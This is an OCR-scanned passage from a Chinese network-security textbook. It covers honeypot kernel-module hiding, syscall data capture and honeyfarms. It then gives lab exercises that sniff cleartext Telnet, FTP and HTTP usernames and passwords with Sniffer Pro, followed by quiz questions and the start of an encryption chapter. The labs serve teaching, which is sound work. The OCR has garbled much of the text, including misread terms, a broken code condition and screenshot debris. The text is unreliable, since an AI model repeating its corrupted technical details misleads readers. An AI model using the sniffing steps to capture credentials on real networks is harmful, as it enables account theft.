后 ， 将 指向 该 模块 的 列表 指针 删除 ， 这 样 通过 遍历 表 查 找 时 就 无 法 找到 该 模块 了 。 

(2) 进程 隐藏 。 

进程 是 一 个 随 执行 过 程 不 断 变 化 的 实体 。 在 Linux 系统 运行 任何 一 个 命令 或 程序 时 都 
会 至 少 建立 一 个 进程 来 执行 ， 蜜 钢 捕 获 程序 必定 会 在 系统 中 运行 多 个 进程 ， 利 用 类 似 于 ps 
查询 进程 信息 的 命令 便 可 以 得 到 所 有 的 进程 信息 ， 这 样 很 容易 就 会 暴露 蜜 铅 的 存在 。 由 于 
在 Linux 中 不 存在 直接 查询 进程 信息 的 系统 调用 , 类 似 于 ps 命令 是 通过 查询 proc 文件 系统 
来 实现 的 。proc 文件 系统 是 一 个 虚拟 的 文件 系统 ， 它 通过 文件 系统 的 接口 实现 ， 用 于 输出 
系统 运行 状态 ， 它 以 文件 系统 的 形式 ， 为 操作 系统 本 身 和 应 用 进程 之 间 的 通信 提供 了 一 个 
界面 ， 使 应 用 程序 能 够 安全 、 方 便 地 获得 系统 当前 的 运行 状况 以 及 内 核 的 内 部 数据 信息 ， 
并 可 以 修改 某 些 系统 的 配置 信息 。 因 此 可 以 像 访问 普通 文件 一 样 访问 它 ， 但 它 只 存在 于 内 
存 之 中 ， 所 以 可 以 用 隐藏 文件 的 方法 来 隐藏 proc 文件 系统 中 的 文件 ， 以 达到 隐藏 进程 
的 目的 。 

看 一 个 文件 是 否 属于 proc 文件 系统 ， 是 根据 它 是 否 只 存在 于 内 存 之 中 ， 不 存在 于 任何 
实际 设备 之 上 这 一 特点 来 判断 的 ， 所 以 Linux 内 核 分 配给 它 一 个 特定 的 主 设备 号 0 以 及 一 
个 特定 的 次 设备 号 1， 除 此 之 外 在 外 存 上 没有 与 之 对 应 的 i 节点 , 所 以 系统 也 分 配给 它 一 个 
特殊 的 节点 号 PROC_ROOT_INO( 值 为 )， 而 设备 上 的 1 号 索引 节点 是 保留 不 用 的 。 这 样 
可 以 得 出 判断 一 个 文件 是 否 属于 proc 文件 系统 的 方法 。 

(1) 得 到 该 文件 对 应 的 inode 结构 d_inode; 

(2) if(d_inode->i ino—PROC ROOT_INO.&&!MAJO(d inode->i dev)&; 

MINOR(d_inode->i_dev) 一 1){ 该 文件 属于 proc 文件 系统 }。 

2) 捕获 加 密会 话 数据 

为 了 观察 入 侵 者 使 用 的 加 密会 话 ， 就 必须 找到 破解 加 密会 话 的 方法 ， 但 这 非常 困难 。 
从 另 一 个 角度 看 ， 加 密 的 信息 如 果 要 使 用 就 肯定 会 在 某 些 地 方 不 加 密 ， 绕 过 加 密 进程 就 可 
以 捕获 未 加 密 的 数据 ， 这 也 是 解密 工作 的 基本 机 制 。 使 用 二 进 制 木马 程序 来 获得 未 保护 的 
数据 ， 是 对 付 加 密 的 一 种 有 效 办 法 。 当 入 侵 者 攻破 蜜 缸 后 ， 他 可 能 会 使 用 如 SSH 加 密 工具 
来 登录 被 攻陷 的 主机 , 登录 的 时 候 肯定 要 输入 命令 , 这 时 木马 shell 程序 会 记录 他 们 的 动作 。 
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不 过 二 进 制 木马 程序 的 隐蔽 性 不 高 ， 而 且 入 侵 者 可 能 会 安装 他 们 自己 的 二 进 制程 序 。 

从 操作 系统 内 核 访 问 数据 是 一 个 很 好 的 捕获 方法 。 不 管 入 侵 者 使 用 什么 二 进 制程 序 ， 
都 可 以 从 内 核 捕获 数据 并 且 可 以 记录 他 们 的 行为 。 而 且 ， 由 于 用 户 空间 和 内 核 空间 是 分 开 
的 ， 所 以 在 技术 上 还 可 以 实现 对 所 有 包括 root 在 内 的 用 户 隐藏 自己 的 动作 。 

由 于 数据 捕获 是 由 内 核 模块 来 完成 的 ， 所 以 要 使 用 这 个 模块 获得 蜜 缸 机 操作 系统 内 核 
空间 的 访问 权限 ， 从 而 捕获 所 有 read0 和 write0 的 数据 。 捕 获 模块 通过 替换 系统 调用 表 的 
read0 和 writeO 函 数 来 实现 这 个 功能 ,这 个 蔡 换 的 新 函数 只 是 简单 地 调用 旧 的 read0 和 waiteO 
函数 ， 并 且 把 内 容 拷 贝 到 一 个 数据 包 缓存 。 

3) 数据 传输 隐蔽 通道 的 建立 

当 蜜 缸 捕获 到 数据 后 , 需要 在 入 侵 者 没有 察觉 的 情况 下 把 数据 发 送 到 蜜 网 网 关 服 务 端 。 
蜜 缸 通常 都 是 布置 在 局 域 网 内 ， 如 果 捕获 模块 只 是 简单 他 使 用 UDP 流 来 给 服务 端 发 送 数 
据 ， 入 侵 者 只 需 监听 网 络 上 的 数据 传输 就 可 以 判断 是 否 有 蜜 缸 系统 的 存在 ， 捕 获 模块 可 以 
通过 修改 内 核 的 方法 ， 使 入 侵 者 无 法 看 到 这 些 数据 包 。 

如 果 一 个 局 域 网 上 的 每 个 蜜 镀 都 安装 了 按照 以 上 方法 改进 后 的 数据 捕获 模块 ， 入 侵 者 
将 不 能 发 现任 何 捕获 模块 的 数据 ， 然 而 服务 端 能 够 不 受 限制 地 访问 这 些 由 蜜 饶 客 户 端 捕获 
的 数据 。 每 个 read0 或 write0 调 用 请 求 都 会 产生 一 个 或 多 个 日 志 数 据 包 , 每 个 数据 包 都 包含 
了 一 点 关于 这 个 调用 内 容 的 信息 和 这 个 调用 访问 的 数据 。 每 个 数据 包 还 包含 了 一 个 记录 ， 
这 个 记录 包含 一 些 产生 调用 的 进程 描述 、 调 用 产生 的 时 间 和 记录 数据 的 大 小 。 这 些 数据 包 
完全 由 捕获 模块 产生 , 而 不 是 使 用 TCP/IP 协议 栈 来 产生 或 发 送 数据 包 ,， 所 以 系统 无 法 看 到 
或 阻 断 这 些 数据 包 。 当 数据 包 创建 好 的 时 候 就 直接 发 送 给 驱动 设备 ， 这 就 绕 过 了 原始 套 接 
字 代 码 和 包 过 滤 代码 。 由 于 入 侵 者 使 用 的 嗅 探 器 通常 都 是 基于 libpcap( 捕 获 函 数 包 ) 的 ， 而 
libpcap 使 用 原始 套 接 字 接口 来 收集 数据 包 ， 所 以 嗅 探 器 不 能 看 到 运行 在 蜜 缸 主机 上 由 捕获 
模块 产生 的 数据 包 。 

同时 还 要 阻止 蜜 镀 A 检测 到 蜜 镀 B 捕获 到 的 数据 包 。 使 用 以 太 交 换 不 能 解决 这 个 问题 ， 
因为 数据 包 不 是 通过 ARP 获取 目标 他 地 址 对 应 的 目标 MAC 地 址 ， 所 以 它 对 ARP 欺骗 有 
自然 免疫 能 力 。 但 是 在 有 些 情 况 下 ，A 可 以 看 到 B 的 数据 包 ， 这 样 入 侵 者 就 可 以 在 蜜 饶 A 
运行 嗅 探 器 来 检测 局 域 网 上 来 自 蜜 缸 B 捕获 到 的 数据 包 。 为 了 解决 这 个 问题 ， 捕 获 模块 的 
数据 包产 生机 制 应 该 通过 自己 独特 的 原始 套 接 字 实现 ， 从 而 实现 安静 地 忽略 来 自 局 域 网 中 
的 其 他 蜜 饶 发 送出 的 数据 包 。 在 发 送 的 数据 包头 定义 了 预先 设 定 的 目标 UDP 端口 和 固有 的 
特定 数字 ， 如 果 这 两 个 值 都 匹配 了 ， 那 么 这 个 数据 包 就 会 被 忽略 。 这 样 蜜 久 A 在 收 到 蜜 铅 
B 的 数据 包 时 就 会 丢弃 它们 并 且 移 到 队列 里 的 下 一 个 数据 包 ， 这 使 得 入 侵 者 用 嗅 探 器 也 无 
法 捕获 数据 包 。 


5.3.3 蜜 场 


1. 密 场 的 概念 


蜜 场 (Honeyfarm) 思 想 最 初 是 由 蜜 镀 权威 Lance Spitzner 提出 的 一 个 概念 模型 ， 该 思想 
的 提出 是 为 了 解决 在 大 型 分 布 式 网 络 中 部 署 蜜 缸 时 存在 的 ， 诸 如 需要 大 量 的 人 力 和 时 间 进 


行 部 署 、 管 理 


E 和 维护 等 一 系列 问题 。 
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蜜 场 的 工作 原理 是 将 所 有 的 蜜 缸 都 集中 部 署 在 一 个 独立 的 网 络 中 ， 这 个 网 络 成 为 蜜 场 
的 中 心 ; 在 每 个 需要 进行 监控 的 子 网 中 布置 一 个 重 定向 器 (Redirector)， 重 定向 器 以 软件 形 
式 存在 ， 它 监听 对 未 用 地 址 或 端口 的 非法 访问 ， 但 它们 不 直接 响应 ， 而 是 把 这 些 非法 访问 
通过 某 种 保密 的 方式 重 定向 到 被 严密 监控 的 蜜 场 中 心 ; 蜜 场 中 心 选 择 某 台 蜜 缸 对 攻击 信息 
进行 响应 ， 然 后 把 响应 传 回 到 具有 非法 访问 的 子 网 中 ， 并 且 利 用 一 些 手段 对 攻击 信息 进行 
收集 和 分 析 。 整 个 过 程 对 非法 访问 者 是 透明 的 。 

2. 蜜 场 与 宣 色 、 蜜 网 的 区 别 


传统 的 蜜 铅 技 术 是 一 个 单一 的 系统 ， 它 的 一 个 明显 的 弱点 是 视野 狭窄 ， 只 能 采集 对 其 
本 身 的 攻击 信息 ， 对 不 攻击 蜜 缸 而 攻击 其 他 的 系统 就 显得 无 能 为 力 。 蜜 网 是 在 蜜 缸 技术 上 
逐步 发 展 起 来 的 一 个 概念 ， 它 不 是 一 个 单一 的 系统 ， 而 是 由 很 多 高 交互 蜜 缸 组 成 的 诱捕 网 
络 ， 每 一 个 蜜 色 都 运行 不 同 的 操作 系统 ， 整 个 蜜 网 的 部 署 也 利用 了 防火 墙 、NIDS、IDS 等 
技术 ， 提 高 了 可 控 性 ， 也 降低 了 风险 。 单 一 的 蜜 网 也 只 是 对 一 个 网 络 中 的 攻击 行为 进行 捕 
获 ， 不 能 应 用 于 大 规模 的 分 布 式 网 络 。 

分 布 式 蜜 饶 系 统 (Distributed Honeypot System, DHS) 是 一 系列 蜜 网 和 蜜 钢 的 集合 , 可 以 
将 不 同 拓 扑 结 构 、 不 同 功用 的 网 络 的 攻击 信息 进行 融合 与 分 析 ， 但 其 最 大 缺点 是 要 耗费 较 
大 的 人 力 和 物力 。 蜜 场 是 一 种 特殊 的 分 布 式 蜜 钠 技 术 , 它 具 有 分 布 式 蜜 缸 技术 的 所 有 优点 ， 
同时 又 以 “逻辑 上 分 散 部 署 ， 物 理 上 集中 部 署 ” 的 优点 弥补 了 分 布 式 蜜 缸 技术 的 不 足 ， 使 
得 部 署 蜜 钢 成 为 一 件 简单 的 事情 。 蜜 场 的 集中 性 也 使 得 蜜 镀 的 维护 、 更 新 、 规 范 化 管理 及 
数据 分 析 变 得 简单 。 


3. 蜜 场 的 研究 价值 


蜜 场 继 承 了 分 布 式 蜜 缸 系统 的 优点 ， 并 具有 以 下 特点 。 

(1) 使 得 部 署 新 的 蜜 缸 变 得 极为 容易 。 要 在 一 个 子 网 内 部 署 蜜 缸 ， 只 需要 在 其 内 部 安 
装 一 个 重 定向 器 即 可 。 蜜 负重 定向 器 是 一 种 比较 简单 的 网 络 设备 ， 不 会 带 来 太 多 的 安全 风 
险 ， 安 装 这 种 设备 也 不 需要 花费 太 多 的 时 间 。 这 使 得 蜜 场 具 有 高 度 灵活 的 结构 。 

(2) 部 署 在 各 个 子 网 的 重 定 向 器 不 需要 这 些 网 络 的 网 管 人 员 做 太 多 的 维护 工作 ， 所 有 
采集 到 的 数据 在 一 个 中 心 点 由 专门 的 安全 人 员 进行 深 入 分 析 ， 并 把 分 析 结 果 返 回 。 这 不 仅 
可 以 减轻 子 网 的 负担 ， 同 时 避免 了 攻击 者 利用 蜜 缸 进行 攻击 ， 从 而 进一步 加 强 了 蜜 缸 风险 
的 控制 。 

(3) 为 大 型 分 布 式 网 络 设立 一 个 全 局 的 安全 监测 中 心 提 供 了 一 条 可 靠 途径 。 轴 辑 上 部 
署 在 各 个 子 网 的 蜜 缸 虽然 只 能 监视 针对 这 些 蜜 缸 的 攻击 ， 但 所 有 这 些 物理 上 集中 分 布 的 蜜 
镀 的 结果 综合 起 来 后 ， 将 能 够 从 一 定 程度 上 显示 网 络 的 全 局 安全 状态 。 


小 ” 结 


本 章 主要 介绍 了 网 络 嗅 探 软件 Sniffer Pro 的 原理 及 主要 的 使 用 方法 ， 网 络 入 侵 和 防护 
系统 的 概念 , 介绍 了 蜜 缸 、 密 网 和 密 场 的 应 用 原理 。 学 习 完 本 章 后 应 该 能 熟练 地 使 用 Sniffer 
检测 出 不 正常 的 网 络 流量 ， 搭 建 适合 自己 的 网 络 防护 系统 。 
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实 训 一 ”捕获 Telnet 数据 包 


1. 实 训 目的 


通过 实验 掌握 数据 包 捕 捉 和 分 析 工 具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
击 过 程 及 其 网 络 系统 的 影响 。 


2. 实 训 环境 
两 台 或 多 台 运 行 Windows XP 系统 的 计算 机 ， 通 过 集线器 相连 。 
3. 实 训 要求 


1) ”安装 Sniffer Pro 

使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 ,并 捕捉 一 定数 量 的 IP、TCP 及 ICMP 
数据 包 ， 掌 握 利 用 工具 软件 观察 网 络 通 信 流 量 及 数据 包 捕 捉 方 法 。 

2) ”分 析 捕获 的 数据 包 

对 上 面 所 捕获 的 数据 包 进行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 
装 格式 。 

按 步 又 完成 试验 任务 ， 撰 写 试验 报告 。 

利用 两 台 主 机 进行 试验 ， 一 台 主机 进行 Telnet 登录 ， 另 一 台 主机 进行 Sniffer 数据 包 的 
捕捉 ， 把 捕捉 到 的 信息 写 出 来 ， 尤 其 是 用 户 名 和 密码 。 

4. 实 训 步骤 

1)” 抓 某 台 机 器 的 所 有 数据 包 

如 图 5-22 所 示 , 本 例 要 抓 192.168.113.208 这 人 台 机 器 的 所 有 数据 包 , 如 图 中 加 选择 这 人 台 
机 器 。 点 击 @ 所 指 图 标 ， 出 现 如 图 5-23 所 示 的 界面 ， 等 到 图 5-23 中 箭头 所 指 的 望远镜 图 
标 变 红 时 ,表示 已 捕捉 到 数据 , 点击 该 图 标 出 现 如 图 5-24 所 示 界 面 , 选 择 箭头 所 指 的 Decode 
选项 即 可 看 到 捕捉 的 所 有 包 。 


Ym 


图 5-22 检测 主机 的 数据 包 图 5-23 ”捕捉 到 数据 


5-24 ”数据 包 和 解码 
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2)” 抓 Telnet 密码 

本 例 从 192.168.113.208 这 台 机 器 telnet 到 192.168.113.50， 用 Sniff Pro 抓 到 用 户 名 和 
密码 。 

步 又 1: 设置 规则 。 

如 图 5-25 所 示 ， 选 择 Capture 菜单 中 的 Defind Filter， 出 现 如 图 5-26 所 示 的 对 话 框 ， 
切换 到 Address 选项 卡 ， 在 Station1 和 Station2 中 分 别 填写 两 台 机 器 的 卫 地 址 。 如 图 5-27 
所 示 , 切换 到 Advanced 选项 卡 , 选择 IP/TCP/Telnet, 将 Packet Size 设置 为 Equal 55, Packet 
Type 设置 为 Normal。 


Say Miress |Dete Fetters | Mreaced | heeer | 
Baress own Mdress: Pragable) 


ky 
加 moscssUealticust Miress 
Maress Bok 


Start Fi0 
Sp FIT 
Stop and Display F9 
Display 


图 5-25 定义 过 滤器 


Define Filter 


Sammary| Mdress | Data Pattern Mavmeed | Baffer| 


5-27 ”限定 抓 包 的 协议 


步骤 2: 抓 包 。 

按 F10 键 出 现 图 5-28 所 示 对 话 框 ， 开 始 抓 包 。 

步骤 3: 运行 telnet 命令 。 

本 例 使 telnet 命令 连接 到 一 台 正 运行 telnet 服务 的 Linux 机 器 上 。 
telnet 192.168.113.50 

login: test 

Password:123456 


- 济 洲 当 兰 半 ” 寺 潍 式 侣 上 村 册 到 沼 卫 


党 9 前 区 全 亡 态 与 入 优 共 济 


5-28 开始 抓 包 


步骤 4: 察看 结果 。 
图 5-29 中 箭头 所 指 的 望远镜 图 标 变 红 时 ,表示 已 捕捉 到 数据 , 点击 该 图 标 出 现 如 图 5-30 
所 示 的 界面 , 选择 第 头 所 指 的 Decode 选项 即 可 看 到 捕捉 的 所 有 包 。 可 以 清楚 地 看 出 用 户 名 
为 test， 密 码 为 123456。 
Ele Monitor Capture Display Iools Database Window Help 
[blunt Kr | 
SI9| 号 | 条 Slslslollmlalal| gl S| 名 | 


5-29 ” 抓 到 数据 包 


村 LC Ethertype"0800，size"60 bytes 
IP: De[192 .466.113.50] So1192 168 113 208] LEN*21 1D24593 

由 鸭 TCE 02) Se2060 MACK59603127 SE0"3488832343 LN VIN*17412 
4 著 Telnet: C PORT*2060 t 


图 5-30” 抓 包 数 据 分 析 1 


解释 : 

虽然 把 密码 抓 到 了 ， 但 大 家 也 许 对 包 大 小 (Packet Size) 设 为 55 不 理解 ， 网 上 的 数据 传 
送 是 把 数据 分 成 若干 个 包 来 传送 ,根据 协议 的 不 同 ， 包 的 大 小 也 不 相同 ， 从 图 5-31 中 可 以 
看 出 当 客户 端 telnet 到 服务 端 时 一 次 只 传送 一 个 字 节 的 数据 ， 由 于 协议 的 头 长 度 是 一 定 的 ， 
所 以 telnet 的 数据 包 大 小 =DLC(14 字 节 )+IP(20 字 节 )+TCP(20 字 节 )+ 数 据 (一 个 字 节 )=55 字 
节 ， 这 样 将 Packet Size 设 为 55 正好 能 抓 到 用 户 名 和 密码 ， 否 则 将 抓 到 许多 不 相关 的 包 。 


© 


(> 计算 机 网 络 安全 (第 2 版 ) 


济 洲 党 类 半 ”过 溢 到 襄 上 出 到 沼 障 


DIC: Ethertype*0800. size*60 bytes 

IP: D-[192.168.113.50] S*[192.168 113.208] LEN*21 ID*24583 
所 国 TCP: D23 S2060 ACK*859603127 SEQ"3488832343 IENr1 VIN"17412 
:路 Telnet :一 一 Telnet 一 


Telnet 

Telnet: + 

Telnet 
Boopooo0: 00 S09 be 29 S80 a0 0 0 18 £0 3 72 98 00 4 00 .EYEO. te 
O000010: 90 39 60 907-40 00 39 9 00 00 50 8 7) 9 0 烽 ql 
(00000020: 31 32 08 0c 00 17 et £3 Sb s’ 3 B70 号 : i ' 
0080030: 44 34 4 BF 0 0 况 59 3 00 6 5 


\ Epent \ Oecose A Votre A ost Table A Protocol Dest 人 Salistics J 
5-31” 抓 包 数 据 分 析 2 


实 训 二 ”捕获 FTP 数据 包 


1. 实 训 目的 


通过 实验 掌握 数据 包 捕捉 和 分 析 工 具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
击 过 程 及 其 网 络 系统 的 影响 。 


2. 实 训 环境 
两 台 或 多 台 运行 Windows XP 系统 的 计算 机 ， 通 过 集线器 相连 。 
3. 实 训 要 求 


1) ”安装 Sniffer Pro 

使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 ,并 捕捉 一 定数 量 的 了 P、TCP 及 ICMP 
数据 包 ， 掌 握 利 用 工具 软件 观察 网 络 通信 流量 及 数据 包 捕捉 方法 。 

2) ”分 析 捕 获 的 数据 包 

对 上 面 所 捕获 的 数据 包 进行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 
装 格式 。 

按 步骤 完成 试验 任务 ， 撰 写 试验 报告 。 

利用 两 台 主 机 进行 试验 ， 一 台 主 机 进行 fp 登录 ， 另 一 台 主 机 进行 Sniffer 数据 包 的 捕 
捉 ， 把 捕捉 到 的 信息 写 出 来 。 

4. 实 训 步 又 


步骤 1: 设置 规则 。 

如 图 5-25 所 示 ， 选 择 Capture 菜单 中 的 Defind Filter 命令 ， 打 开 如 图 5-32 所 示 的 对 话 
框 ， 切 换 到 Address 选项 卡 ， 在 Stationl 和 Station2 中 分 别 填 写 两 台 机 器 的 卫 地 址 。 切 换 
到 Advanced 选项 卡 , 选择 IP/TCP/FTP, 将 Packet Size 设置 为 In Between 63-71, Packet Type 
设置 为 Normal。 如 图 5-33 所 示 ， 切 换 到 Data Patter 选项 卡 ， 单 击 箭头 所 指 的 Add Pattern 
按钮 ， 出 现 如 图 5-34 所 示 的 对 话 框 ， 按 图 设置 Offset 为 2F， 在 方 格 内 填 入 18，Name 可 任 
意 起 。 确 定 后 显示 如 图 5-35 所 示 的 对 话 框 ， 单 击 Add NOT 按钮 ， 再 单 击 Add Pattern 按 


钮 增加 第 二 条 规则 ， 如 图 5-36 所 示 设 置 好 规则 ， 确 定 后 界面 如 图 5-37 所 示 。 


图 5-34 添加 发 送 数据 包 1 
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图 5-37 ”规则 增加 完成 界面 
步骤 2: 抓 包 。 
按 F10 键 出 现 如 图 5-28 所 示 的 界面 ， 开 始 抓 包 。 
步骤 3: 运行 FTP 命令 。 
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本 例 使 FTP 命令 连接 到 一 台 正 运行 FTP 服务 的 Linux 机 器 上 。 
D:/>ftp 192.168.113.50 
Connected to 192.168.113.50. 
220 testl FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready. 
User (192.168.113.50:(none)): test 
331 Password required for test. 
Password: 
步骤 4: 查看 结果 。 
前 面 图 5-29 中 箭头 所 指 的 望远镜 图 标 变 红 时 ， 表 示 已 捕捉 到 数据 ， 点 击 该 图 标 出 现 如 
图 5-38 所 示 的 界面 ， 选 择 箭头 所 指 的 Decode 选项 即 可 看 到 捕捉 的 所 有 包 。 可 以 清楚 地 看 
出 用 户 名 为 test， 密 码 为 123456789。 


DIC Ethertype-0000 size-70 bytes 
由 和 IP: D-[152.168.113.50] S*{192,168 113 209] LEN=36 ID-9762 
全 TcP. D"21 5*1949 ACKw3963455923 SEQ"380460806 LEN"16 on 17408 


00 0 be 1 50 a0 00 0z Ie 19 31 72 0800 45 00 加 E 
22 40 00 00 06 90 00 od 38 7 d0 eo a0 Ws 号 - 涝 经 1 
15 16 sd 55 06 ec 3d 89 b3 50 18 92.?. -她 7 
7e 2 3 PASS 12345 
0 27 38 39 04 oa 57892 


Decode /WMAKHostTebe 人 roloco DRL 人 Shelatics 


图 5-38 ”数据 抓 包 结果 分 析 


解释 : 

虽然 把 密码 抓 到 了 ， 但 大 家 也 许 还 不 理解 ， 将 图 5-30 中 Packet Size 设置 为 63-71 是 根 
据 用 户 名 和 口令 的 包 大 小 来 设置 的 ， 从 图 5-38 中 可 以 看 出 口令 的 数据 包 长 度 为 70 字 节 ， 
其 中 协议 头 长 度 为 : 14+20+20=54， 与 telnet 的 头 长 度 相同 。Ftp 的 数据 长 度 为 16， 其 中 关 
键 字 PASS 占 4 个 字 节 、 空 格 占 1 个 字 节 ， 密 码 占 9 个 字 节 。Od 0a( 回 车 换行 ) 占 2 个 字 节 ， 
包 长 度 =54+16=70。 如 果 用 户 名 和 密码 比较 长 ， 那 么 Packet Size 的 值 也 要 相应 的 增长 。 

Data Pattern 中 的 设置 是 根据 用 户 名 和 密码 中 包 的 特有 规则 设 定 的 ， 为 了 更 好 地 说 明 这 
个 问题 ， 请 在 开 着 图 5-38 的 情况 下 选择 Capture 菜单 中 的 Defind Filter， 如 图 5-33 所 示 ， 
切换 到 Data Pattern 选项 卡 ， 单 击 箭头 所 指 的 Add Pattern 按钮 ， 出 现 如 图 5-39 所 示 界 面 ， 
选择 图 中 1 所 指 的 卫 ， 然 后 单 击 2 所 指 的 Set Data 按钮 。Offset、 方 格 内 、Name 填 上 相应 
的 值 。 

同 理 图 5-40 中 也 是 如 此 。 

这 些 规 则 的 设置 都 是 根据 你 要 抓 的 包 的 相应 特征 来 设置 的 , 这 些 都 需要 对 TCP/IP 协议 
有 深入 的 了 解 ， 从 图 5-41 中 可 以 看 出 网 上 传输 的 都 是 一 位 一 位 的 比特 流 ， 操 作 系统 将 比特 
流转 换 为 二 进 制 ，Sniffer 这 类 的 软件 又 把 二 进 制 换算 为 十 六 进 制 ， 然 后 又 为 这 些 数 赋予 相 
应 的 意思 ， 图 中 的 18 指 的 是 TCP 协议 中 的 标志 位 是 18; Offset 指 的 是 数据 包 中 某 位 数据 
的 位 置 ， 方 格 内 填 的 是 值 。 


>》 计算 机 网 络 安全 (第 2 版 ) 


header lengch = 和 byres 


= roucine 
Pe ps 


图 5-39 添加 发 送 数据 包 3 


:dit Pattern 


I evee: ol or he 已 | 
L1|z|s3|4|s|s|z|sls|ale|e|dle|r| 


: Sequence nunber = 380460795 
Next expected Seq nunber= 380460806 

: Acknowledgmenc nunber = 3963455890 

: Daca offset -20byes 
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图 5-41 数据 包 分 析 
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实 训 三 ”捕获 http 数据 包 


1. 实 训 目的 


通过 实验 掌握 数据 包 捕捉 和 分 析 工 具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
击 过 程 及 其 网 络 系统 的 影响 。 


2. 实 训 环境 


两 台 或 多 台 运 行 Windows XP 系统 的 计算 机 ， 通 过 集线器 相连 。 


3. 实 训 要 求 


1) 使 用 Sniffer 捕捉 数据 包 
使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 , 并 捕捉 一 定数 量 的 了 P、TCP 及 ICMP 


数据 包 ， 掌 握 利 


用 工具 软件 观察 网 络 通信 流量 及 数据 包 捕捉 方法 。 


2) ”分 析 捕 获 的 数据 包 
对 上 面 所 捕获 的 数据 包 进行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 


装 格式 。 


利用 两 台 主机 进行 试验 ， 一 台 主机 进行 http 网 页 请 求 ， 另 一 台 主 机 进行 Sniffer 数据 包 
的 捕捉 ， 把 捕捉 到 的 信息 写 出 来 。 


4. 实 训 步骤 


步骤 1: 设置 规则 。 


按照 图 5-42 


和 图 5-43 所 示 ， 进 行 设置 规则 ， 设 置 方法 同上 。 


Summary | Mddress | Data Pattern Advanced |maseer1 


| 了 Profiles...| 
5-42 定义 抓 HTTP 数据 包 
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图 5-43 添加 数据 面板 


步骤 2: 抓 包 。 

按 F10 键 开始 抓 包 。 

步骤 3: 访问 www.ccidnet.com 网 站 。 

步骤 4: 查看 结果 。 

5-29 中 箭头 所 指 的 望远镜 图 标 变 红 时 ,表示 已 捕捉 到 数据 , 点击 该 图 标 出 现 如 图 5-44 
所 示 的 界面 ， 选 择 箭头 所 指 的 Decode 选项 即 可 看 到 捕捉 的 所 有 包 。 在 Summary 中 找到 含 
有 POST 关键 字 的 包 ， 可 以 清楚 地 看 出 用 户 名 为 qiangkn997， 密 码 为 ?。 


11927155 113 208) L423! IDe22523 


HTTP, C Fort*3126 FOST /cqs/161/ login pro cgs HTTP/L 人 


图 5-44 ” 抓 包 数据 分 析 


本 章 习 题 
一 、 选 择 题 
1. 入 侵 检 测 系统 的 第 一 步 是 (  ).。 
A. 信号 分 析 B. 信息 收集 


C. 数据 包 过 滤 D. 数据 包 检查 
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入 侵 检测 系统 在 进行 信号 分 析 时 ， 一 般 通过 三 种 常用 的 技术 手段 ， 不 属于 通常 的 
三 种 技术 手段 的 是 ( )。 


A. 模式 匹配 B. 统计 分 析 

C. 完整 性 分 析 D. 密 文 分 析 

入 侵 检 测 系统 通常 采用 的 是 ( ) 

A. 基于 网 络 的 入 侵 检测 B. 基于 了 他 的 入 侵 检 测 
C. 基于 服务 的 入 侵 检 测 D. 基于 域名 的 入 侵 检测 
不 属于 入 侵 检 测 系统 的 功能 是 ( 六 

A. 监视 网 络 上 的 通信 数据 流 B. 捕捉 可 疑 的 网 络 活动 
C. 提供 安全 审计 报告 D. 过 小 非法 的 数据 包 
填空 题 

入 侵 检 测 系统 主要 包括 三 部 分 : 和 

IPS 的 种 类 是 和 

简 答题 

入 侵 检测 系统 可 以 分 为 哪 几 类 ? 


试 述 入 侵 检测 系统 的 组 成 ， 并 画 出 其 工作 流程 图 。 


试 述 入 侵 检测 模型 的 类 型 。 
试 述 侵 检测 系统 (IDS) 的 主要 功能 。 


第 6 章 加密 技 术 与 虚拟 专用 网 


【本 章 要 点 】 


本 章 主要 介绍 加 密 技术 的 基本 知识 和 虚拟 专用 网 的 相关 知识 。 和 希望 读者 通过 本 章 的 学 
习 ， 能 够 掌握 加 密 技术 中 常用 的 几 种 算法 的 实践 和 理论 知识 。 对 信息 时 代 的 电子 商务 加 密 
技术 有 全 面 的 认识 和 掌握 。 


6.1 加 密 技 术 


密码 学 是 一 门 古老 的 学 科 , 在 古代 就 已 经 得 到 应 用 , 但 仅 限于 外 交 和 军事 等 重要 领域 。 
近年 来 ， 随 着 信息 技术 突飞猛进 的 发 展 和 计算 机 技术 的 广泛 应 用 ， 计 算 机 通信 网 络 得 到 长 
足 的 发 展 , 密码 技术 正在 不 断 向 更 多 其 他 领域 渗透 。 特别 是 随 着 Internet 用 户 的 激增 , 世界 
正 步 入 网 络 经 济 的 新 时 代 。 对 更 高 效 的 生产 和 产品 销售 渠道 的 需求 ， 引 发 了 人 们 对 高 技术 
生产 力 的 要 求 ， 由 此 产生 了 一 批 具有 代表 性 的 网 络 经 济 模式 ， 如 电子 商务 (Electronic 
Commerce)、 电 子 现金 [Electronic Cash)、 数 字 货 币 (Digital Cash) 和 网 络 银行 (Network Bank) 
等 。 我 国 商务 部 电子 商务 和 信息 化 司 发 布 的 《中 国电 子 商务 发 展 报告 (2012)》 显 示 ，2012 
年 我 国电 子 商 务 保持 持续 快速 增长 的 势头 ， 电 子 商 务 交 易 额 突破 8 万 亿 ， 同 比 增长 31.7%， 
其 中 网 络 零售 额 超过 1.3 万 亿 ， 同 比 增长 67.5%， 同 时 电子 商务 服务 业 正 在 成 为 一 个 新 
兴 产 业 ， 全 年 行业 营 收 规模 超过 2 000 亿 元， 电子 商务 作为 战略 性 新 兴 产 业 ， 在 转变 经 济 
方式 ,推动 产业 升级 ,促进 流通 现代 化 的 过 程 中 发 挥 着 重要 作用 ,已 经 成 为 国家 增加 内 需 ， 
促进 消费 、 增 加 就 业 的 重要 途径 之 一 。 预 计 2013 年 全 国 网 络 零售 市 场 交易 额 则 有 望 达到 
18 155 亿 元 。 伴 随 这 种 高 增长 的 ， 就 是 对 网 络 经 济 的 安全 需求 。 

在 信息 时 代 ， 如 何 使 我 们 的 数据 不 被 一 些 怀 有 不 良 用 心 的 人 看 到 或 破坏 是 一 个 严肃 的 
